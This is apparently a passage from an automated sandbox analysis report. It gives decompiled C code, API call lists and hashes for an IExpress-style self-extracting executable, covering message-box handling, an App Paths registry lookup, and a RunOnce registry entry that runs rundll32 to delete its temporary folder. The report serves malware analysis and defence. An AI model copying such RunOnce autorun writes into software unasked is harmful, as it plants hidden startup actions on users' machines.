                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                                                                                                                                                                                                            • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                                                                                                                                                                                            • API String ID: 1865808269-1731843650
                                                                                                                                                                                                                                            • Opcode ID: 795400674b9158c5e41d58c2e756c4c2ec9cf5b1a13d1e2f8fd380a2a28ad202
                                                                                                                                                                                                                                            • Instruction ID: 03cca8148bfa5475ca4234ec23087fe852fffd6db836aff832bb2d9d5c9b65bd
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 795400674b9158c5e41d58c2e756c4c2ec9cf5b1a13d1e2f8fd380a2a28ad202
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2A41C374B00204AFDF119BB4DC88AAE7BF4EB4A384F54456AE941AB251CF788C0387A1
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                                                                            			E00A944B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v64;
                                                                                                                                                                                                                                            				char _v576;
                                                                                                                                                                                                                                            				void* _v580;
                                                                                                                                                                                                                                            				struct HWND__* _v584;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t34;
                                                                                                                                                                                                                                            				void* _t37;
                                                                                                                                                                                                                                            				signed int _t39;
                                                                                                                                                                                                                                            				intOrPtr _t43;
                                                                                                                                                                                                                                            				signed int _t44;
                                                                                                                                                                                                                                            				signed int _t49;
                                                                                                                                                                                                                                            				signed int _t52;
                                                                                                                                                                                                                                            				void* _t54;
                                                                                                                                                                                                                                            				intOrPtr _t55;
                                                                                                                                                                                                                                            				intOrPtr _t58;
                                                                                                                                                                                                                                            				intOrPtr _t59;
                                                                                                                                                                                                                                            				int _t64;
                                                                                                                                                                                                                                            				void* _t66;
                                                                                                                                                                                                                                            				intOrPtr* _t67;
                                                                                                                                                                                                                                            				signed int _t69;
                                                                                                                                                                                                                                            				intOrPtr* _t73;
                                                                                                                                                                                                                                            				intOrPtr* _t76;
                                                                                                                                                                                                                                            				intOrPtr* _t77;
                                                                                                                                                                                                                                            				void* _t80;
                                                                                                                                                                                                                                            				void* _t81;
                                                                                                                                                                                                                                            				void* _t82;
                                                                                                                                                                                                                                            				intOrPtr* _t84;
                                                                                                                                                                                                                                            				void* _t85;
                                                                                                                                                                                                                                            				signed int _t89;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t75 = __edx;
                                                                                                                                                                                                                                            				_t34 =  *0xa98004; // 0x306ebedf
                                                                                                                                                                                                                                            				_v8 = _t34 ^ _t89;
                                                                                                                                                                                                                                            				_v584 = __ecx;
                                                                                                                                                                                                                                            				_t83 = "LoadString() Error.  Could not load string resource.";
                                                                                                                                                                                                                                            				_t67 = _a4;
                                                                                                                                                                                                                                            				_t69 = 0xd;
                                                                                                                                                                                                                                            				_t37 = memcpy( &_v64, _t83, _t69 << 2);
                                                                                                                                                                                                                                            				_t80 = _t83 + _t69 + _t69;
                                                                                                                                                                                                                                            				_v580 = _t37;
                                                                                                                                                                                                                                            				asm("movsb");
                                                                                                                                                                                                                                            				if(( *0xa98a38 & 0x00000001) != 0) {
                                                                                                                                                                                                                                            					_t39 = 1;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_v576 = 0;
                                                                                                                                                                                                                                            					LoadStringA( *0xa99a3c, _t75,  &_v576, 0x200);
                                                                                                                                                                                                                                            					if(_v576 != 0) {
                                                                                                                                                                                                                                            						_t73 =  &_v576;
                                                                                                                                                                                                                                            						_t16 = _t73 + 1; // 0x1
                                                                                                                                                                                                                                            						_t75 = _t16;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t43 =  *_t73;
                                                                                                                                                                                                                                            							_t73 = _t73 + 1;
                                                                                                                                                                                                                                            						} while (_t43 != 0);
                                                                                                                                                                                                                                            						_t84 = _v580;
                                                                                                                                                                                                                                            						_t74 = _t73 - _t75;
                                                                                                                                                                                                                                            						if(_t84 == 0) {
                                                                                                                                                                                                                                            							if(_t67 == 0) {
                                                                                                                                                                                                                                            								_t27 = _t74 + 1; // 0x2
                                                                                                                                                                                                                                            								_t83 = _t27;
                                                                                                                                                                                                                                            								_t44 = LocalAlloc(0x40, _t83);
                                                                                                                                                                                                                                            								_t80 = _t44;
                                                                                                                                                                                                                                            								if(_t80 == 0) {
                                                                                                                                                                                                                                            									goto L6;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_t75 = _t83;
                                                                                                                                                                                                                                            									_t74 = _t80;
                                                                                                                                                                                                                                            									E00A91680(_t80, _t83,  &_v576);
                                                                                                                                                                                                                                            									goto L23;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t76 = _t67;
                                                                                                                                                                                                                                            								_t24 = _t76 + 1; // 0x1
                                                                                                                                                                                                                                            								_t85 = _t24;
                                                                                                                                                                                                                                            								do {
                                                                                                                                                                                                                                            									_t55 =  *_t76;
                                                                                                                                                                                                                                            									_t76 = _t76 + 1;
                                                                                                                                                                                                                                            								} while (_t55 != 0);
                                                                                                                                                                                                                                            								_t25 = _t76 - _t85 + 0x64; // 0x65
                                                                                                                                                                                                                                            								_t83 = _t25 + _t74;
                                                                                                                                                                                                                                            								_t44 = LocalAlloc(0x40, _t25 + _t74);
                                                                                                                                                                                                                                            								_t80 = _t44;
                                                                                                                                                                                                                                            								if(_t80 == 0) {
                                                                                                                                                                                                                                            									goto L6;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									E00A9171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                                                            									goto L23;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t77 = _t67;
                                                                                                                                                                                                                                            							_t18 = _t77 + 1; // 0x1
                                                                                                                                                                                                                                            							_t81 = _t18;
                                                                                                                                                                                                                                            							do {
                                                                                                                                                                                                                                            								_t58 =  *_t77;
                                                                                                                                                                                                                                            								_t77 = _t77 + 1;
                                                                                                                                                                                                                                            							} while (_t58 != 0);
                                                                                                                                                                                                                                            							_t75 = _t77 - _t81;
                                                                                                                                                                                                                                            							_t82 = _t84 + 1;
                                                                                                                                                                                                                                            							do {
                                                                                                                                                                                                                                            								_t59 =  *_t84;
                                                                                                                                                                                                                                            								_t84 = _t84 + 1;
                                                                                                                                                                                                                                            							} while (_t59 != 0);
                                                                                                                                                                                                                                            							_t21 = _t74 + 0x64; // 0x65
                                                                                                                                                                                                                                            							_t83 = _t21 + _t84 - _t82 + _t75;
                                                                                                                                                                                                                                            							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
                                                                                                                                                                                                                                            							_t80 = _t44;
                                                                                                                                                                                                                                            							if(_t80 == 0) {
                                                                                                                                                                                                                                            								goto L6;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_push(_v580);
                                                                                                                                                                                                                                            								E00A9171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                                                            								L23:
                                                                                                                                                                                                                                            								MessageBeep(_a12);
                                                                                                                                                                                                                                            								if(E00A9681F(_t67) == 0) {
                                                                                                                                                                                                                                            									L25:
                                                                                                                                                                                                                                            									_t49 = 0x10000;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_t54 = E00A967C9(_t74, _t74);
                                                                                                                                                                                                                                            									_t49 = 0x190000;
                                                                                                                                                                                                                                            									if(_t54 == 0) {
                                                                                                                                                                                                                                            										goto L25;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								_t52 = MessageBoxA(_v584, _t80, "lenta", _t49 | _a12 | _a16);
                                                                                                                                                                                                                                            								_t83 = _t52;
                                                                                                                                                                                                                                            								LocalFree(_t80);
                                                                                                                                                                                                                                            								_t39 = _t52;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						if(E00A9681F(_t67) == 0) {
                                                                                                                                                                                                                                            							L4:
                                                                                                                                                                                                                                            							_t64 = 0x10010;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t66 = E00A967C9(0, 0);
                                                                                                                                                                                                                                            							_t64 = 0x190010;
                                                                                                                                                                                                                                            							if(_t66 == 0) {
                                                                                                                                                                                                                                            								goto L4;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t44 = MessageBoxA(_v584,  &_v64, "lenta", _t64);
                                                                                                                                                                                                                                            						L6:
                                                                                                                                                                                                                                            						_t39 = _t44 | 0xffffffff;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00A96CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
                                                                                                                                                                                                                                            			}

                                                                                                                                                                                                                                            0x00a945a3
                                                                                                                                                                                                                                            0x00a945a9
                                                                                                                                                                                                                                            0x00a945ad
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a945af
                                                                                                                                                                                                                                            0x00a945af
                                                                                                                                                                                                                                            0x00a945bf
                                                                                                                                                                                                                                            0x00a9462d
                                                                                                                                                                                                                                            0x00a94630
                                                                                                                                                                                                                                            0x00a9463d
                                                                                                                                                                                                                                            0x00a9464e
                                                                                                                                                                                                                                            0x00a9464e
                                                                                                                                                                                                                                            0x00a9463f
                                                                                                                                                                                                                                            0x00a94640
                                                                                                                                                                                                                                            0x00a94647
                                                                                                                                                                                                                                            0x00a9464c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a9464c
                                                                                                                                                                                                                                            0x00a94666
                                                                                                                                                                                                                                            0x00a9466d
                                                                                                                                                                                                                                            0x00a9466f
                                                                                                                                                                                                                                            0x00a94675
                                                                                                                                                                                                                                            0x00a94675
                                                                                                                                                                                                                                            0x00a945ad
                                                                                                                                                                                                                                            0x00a94527
                                                                                                                                                                                                                                            0x00a9452e
                                                                                                                                                                                                                                            0x00a9453f
                                                                                                                                                                                                                                            0x00a9453f
                                                                                                                                                                                                                                            0x00a94530
                                                                                                                                                                                                                                            0x00a94531
                                                                                                                                                                                                                                            0x00a94538
                                                                                                                                                                                                                                            0x00a9453d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a9453d
                                                                                                                                                                                                                                            0x00a94554
                                                                                                                                                                                                                                            0x00a9455a
                                                                                                                                                                                                                                            0x00a9455a
                                                                                                                                                                                                                                            0x00a9455a
                                                                                                                                                                                                                                            0x00a94525
                                                                                                                                                                                                                                            0x00a9468c

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A94518
                                                                                                                                                                                                                                            • MessageBoxA.USER32(?,?,lenta,00010010), ref: 00A94554
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000065), ref: 00A945A3
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000065), ref: 00A945E3
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000002), ref: 00A9460D
                                                                                                                                                                                                                                            • MessageBeep.USER32(00000000), ref: 00A94630
                                                                                                                                                                                                                                            • MessageBoxA.USER32(?,00000000,lenta,00000000), ref: 00A94666
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00A9466F
                                                                                                                                                                                                                                              • Part of subcall function 00A9681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 00A9686E
                                                                                                                                                                                                                                              • Part of subcall function 00A9681F: GetSystemMetrics.USER32(0000004A), ref: 00A968A7
                                                                                                                                                                                                                                              • Part of subcall function 00A9681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00A968CC
                                                                                                                                                                                                                                              • Part of subcall function 00A9681F: RegQueryValueExA.ADVAPI32(?,00A91140,00000000,?,?,0000000C), ref: 00A968F4
                                                                                                                                                                                                                                              • Part of subcall function 00A9681F: RegCloseKey.ADVAPI32(?), ref: 00A96902
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
                                                                                                                                                                                                                                            • String ID: LoadString() Error. Could not load string resource.$lenta
                                                                                                                                                                                                                                            • API String ID: 3244514340-1000497449
                                                                                                                                                                                                                                            • Opcode ID: 3ab52fdcb78c6fd26376186aa6fdefc8b303e7811793601cc513009e7fda2785
                                                                                                                                                                                                                                            • Instruction ID: c27248ad4f88c2f1bd6b22dc164baba6ac3f33d16f40067c2cc6b4cb95037dec
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3ab52fdcb78c6fd26376186aa6fdefc8b303e7811793601cc513009e7fda2785
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2151B276B00215ABDF219FA88D48BAA7BF9EF4A300F154196F949A7241DB319D06CB90
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                                                                            			E00A92773(CHAR* __ecx, char* _a4) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				char _v269;
                                                                                                                                                                                                                                            				CHAR* _v276;
                                                                                                                                                                                                                                            				int _v280;
                                                                                                                                                                                                                                            				void* _v284;
                                                                                                                                                                                                                                            				int _v288;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t23;
                                                                                                                                                                                                                                            				intOrPtr _t34;
                                                                                                                                                                                                                                            				int _t45;
                                                                                                                                                                                                                                            				int* _t50;
                                                                                                                                                                                                                                            				CHAR* _t52;
                                                                                                                                                                                                                                            				CHAR* _t61;
                                                                                                                                                                                                                                            				char* _t62;
                                                                                                                                                                                                                                            				int _t63;
                                                                                                                                                                                                                                            				CHAR* _t64;
                                                                                                                                                                                                                                            				signed int _t65;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t52 = __ecx;
                                                                                                                                                                                                                                            				_t23 =  *0xa98004; // 0x306ebedf
                                                                                                                                                                                                                                            				_v8 = _t23 ^ _t65;
                                                                                                                                                                                                                                            				_t62 = _a4;
                                                                                                                                                                                                                                            				_t50 = 0;
                                                                                                                                                                                                                                            				_t61 = __ecx;
                                                                                                                                                                                                                                            				_v276 = _t62;
                                                                                                                                                                                                                                            				 *((char*)(__ecx)) = 0;
                                                                                                                                                                                                                                            				if( *_t62 != 0x23) {
                                                                                                                                                                                                                                            					_t63 = 0x104;
                                                                                                                                                                                                                                            					goto L14;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t64 = _t62 + 1;
                                                                                                                                                                                                                                            					_v269 = CharUpperA( *_t64);
                                                                                                                                                                                                                                            					_v276 = CharNextA(CharNextA(_t64));
                                                                                                                                                                                                                                            					_t63 = 0x104;
                                                                                                                                                                                                                                            					_t34 = _v269;
                                                                                                                                                                                                                                            					if(_t34 == 0x53) {
                                                                                                                                                                                                                                            						L14:
                                                                                                                                                                                                                                            						GetSystemDirectoryA(_t61, _t63);
                                                                                                                                                                                                                                            						goto L15;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						if(_t34 == 0x57) {
                                                                                                                                                                                                                                            							GetWindowsDirectoryA(_t61, 0x104);
                                                                                                                                                                                                                                            							goto L16;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_push(_t52);
                                                                                                                                                                                                                                            							_v288 = 0x104;
                                                                                                                                                                                                                                            							E00A91781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
                                                                                                                                                                                                                                            							_t59 = 0x104;
                                                                                                                                                                                                                                            							E00A9658A( &_v268, 0x104, _v276);
                                                                                                                                                                                                                                            							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
                                                                                                                                                                                                                                            								L16:
                                                                                                                                                                                                                                            								_t59 = _t63;
                                                                                                                                                                                                                                            								E00A9658A(_t61, _t63, _v276);
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								if(RegQueryValueExA(_v284, 0xa91140, 0,  &_v280, _t61,  &_v288) == 0) {
                                                                                                                                                                                                                                            									_t45 = _v280;
                                                                                                                                                                                                                                            									if(_t45 != 2) {
                                                                                                                                                                                                                                            										L9:
                                                                                                                                                                                                                                            										if(_t45 == 1) {
                                                                                                                                                                                                                                            											goto L10;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                                                            											_t45 = _v280;
                                                                                                                                                                                                                                            											goto L9;
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											_t59 = 0x104;
                                                                                                                                                                                                                                            											E00A91680(_t61, 0x104,  &_v268);
                                                                                                                                                                                                                                            											L10:
                                                                                                                                                                                                                                            											_t50 = 1;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								RegCloseKey(_v284);
                                                                                                                                                                                                                                            								L15:
                                                                                                                                                                                                                                            								if(_t50 == 0) {
                                                                                                                                                                                                                                            									goto L16;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00A96CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
                                                                                                                                                                                                                                            			}
























                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CharUpperA.USER32(306EBEDF,00000000,00000000,00000000), ref: 00A927A8
                                                                                                                                                                                                                                            • CharNextA.USER32(0000054D), ref: 00A927B5
                                                                                                                                                                                                                                            • CharNextA.USER32(00000000), ref: 00A927BC
                                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A92829
                                                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,00A91140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A92852
                                                                                                                                                                                                                                            • ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A92870
                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A928A0
                                                                                                                                                                                                                                            • GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 00A928AA
                                                                                                                                                                                                                                            • GetSystemDirectoryA.KERNEL32 ref: 00A928B9
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 00A927E4
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                                                                                                                                                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                                                                                                                                                                                            • API String ID: 2659952014-2428544900
                                                                                                                                                                                                                                            • Opcode ID: a59aecb514c2d7d1195e2f63776421f9450845e7fa764a178928852599c2495a
                                                                                                                                                                                                                                            • Instruction ID: 0d23a77eda34f2c0fe8087a8abffe9b9315949efda8f11b62a32a3f63311a099
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a59aecb514c2d7d1195e2f63776421f9450845e7fa764a178928852599c2495a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 24416071B00128ABDF24DB649C85BFA77FDEF65700F1480AAF549D2110DB708E868FA1
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 62%
                                                                                                                                                                                                                                            			E00A92267() {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				char _v836;
                                                                                                                                                                                                                                            				void* _v840;
                                                                                                                                                                                                                                            				int _v844;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t19;
                                                                                                                                                                                                                                            				intOrPtr _t33;
                                                                                                                                                                                                                                            				void* _t38;
                                                                                                                                                                                                                                            				intOrPtr* _t42;
                                                                                                                                                                                                                                            				void* _t45;
                                                                                                                                                                                                                                            				void* _t47;
                                                                                                                                                                                                                                            				void* _t49;
                                                                                                                                                                                                                                            				signed int _t51;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t19 =  *0xa98004; // 0x306ebedf
                                                                                                                                                                                                                                            				_t20 = _t19 ^ _t51;
                                                                                                                                                                                                                                            				_v8 = _t19 ^ _t51;
                                                                                                                                                                                                                                            				if( *0xa98530 != 0) {
                                                                                                                                                                                                                                            					_push(_t49);
                                                                                                                                                                                                                                            					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
                                                                                                                                                                                                                                            						_push(_t38);
                                                                                                                                                                                                                                            						_v844 = 0x238;
                                                                                                                                                                                                                                            						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
                                                                                                                                                                                                                                            							_push(_t47);
                                                                                                                                                                                                                                            							memset( &_v268, 0, 0x104);
                                                                                                                                                                                                                                            							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                            								E00A9658A( &_v268, 0x104, 0xa91140);
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_push("C:\Users\jones\AppData\Local\Temp\IXP002.TMP\");
                                                                                                                                                                                                                                            							E00A9171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
                                                                                                                                                                                                                                            							_t42 =  &_v836;
                                                                                                                                                                                                                                            							_t45 = _t42 + 1;
                                                                                                                                                                                                                                            							_pop(_t47);
                                                                                                                                                                                                                                            							do {
                                                                                                                                                                                                                                            								_t33 =  *_t42;
                                                                                                                                                                                                                                            								_t42 = _t42 + 1;
                                                                                                                                                                                                                                            							} while (_t33 != 0);
                                                                                                                                                                                                                                            							RegSetValueExA(_v840, "wextract_cleanup2", 0, 1,  &_v836, _t42 - _t45 + 1);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t20 = RegCloseKey(_v840);
                                                                                                                                                                                                                                            						_pop(_t38);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_pop(_t49);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00A96CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
                                                                                                                                                                                                                                            			}




















                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 00A922A3
                                                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,wextract_cleanup2,00000000,00000000,?,?,00000001), ref: 00A922D8
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00A922F5
                                                                                                                                                                                                                                            • GetSystemDirectoryA.KERNEL32 ref: 00A92305
                                                                                                                                                                                                                                            • RegSetValueExA.ADVAPI32(?,wextract_cleanup2,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 00A9236E
                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00A9237A
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 00A9232D
                                                                                                                                                                                                                                            • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00A92299
                                                                                                                                                                                                                                            • wextract_cleanup2, xrefs: 00A9227C, 00A922CD, 00A92363
                                                                                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00A92321
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Value$CloseDirectoryOpenQuerySystemmemset
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup2
                                                                                                                                                                                                                                            • API String ID: 3027380567-1720115735
                                                                                                                                                                                                                                            • Opcode ID: 65f4223cc5b7f02bf10057cc87268a68ed712faebb8fd78d63ed75c6a056e882
                                                                                                                                                                                                                                            • Instruction ID: 7f2562d8f57296b15651d63e88d2ab7e6d1ea9574cf4e17745e8897ec9a426d1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 65f4223cc5b7f02bf10057cc87268a68ed712faebb8fd78d63ed75c6a056e882
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C1319371B00218BBDF21DB65DC49FEB77BCEB15700F0001AAB50DAA050EE746B89CB90
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 87%
                                                                                                                                                                                                                                            			E00A93100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                            				void* _t8;
